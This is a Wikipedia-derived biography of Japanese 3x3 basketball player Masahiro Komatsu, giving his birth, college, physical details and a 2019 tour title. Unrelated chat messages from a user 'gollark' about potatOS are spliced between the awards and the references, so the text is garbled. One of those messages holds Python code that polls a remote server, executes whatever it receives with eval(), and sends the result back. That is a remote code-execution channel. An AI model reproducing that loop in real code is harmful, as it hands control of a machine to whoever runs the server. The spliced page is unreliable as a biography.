Masahiro Komatsu

Masahiro Komatsu (born April 22, 1984) is a Japanese basketball player who plays for Japan men's national 3x3 team. [1][2] He played college basketball for University of Tsukuba.

Masahiro Komatsu
小松昌弘
No. 70 Japan national basketball team
PositionForward
LeagueFIBA 3X3
Personal information
Born (1984-04-22) April 22, 1984
Miyagi Prefecture
NationalityJapanese
Listed height6 ft 3 in (1.91 m)
Listed weight196 lb (89 kg)
Career information
High school
  • Sendai (Sendai, Miyagi)
CollegeUniversity of Tsukuba

Awards & Honors

  • 3x3 Central Europe Tour 2019 - Chance 3x3 Tour Jindřichův Hradec Champions
gollark: This is *technically* a "web license lookup thing".
gollark: OmniDisks look up some random pastebin file.
gollark: Hmm, idea: what if I make `potatOS.update` just send an event to `potatoupd` instead of actually running the update routines itself?
gollark: Well, OmniDisks are revoked via the web license lookup thing.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```As you can see, this is much more portable than the old SPUDNET Python implementation, which needed websockets and asyncio and such.

References

This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.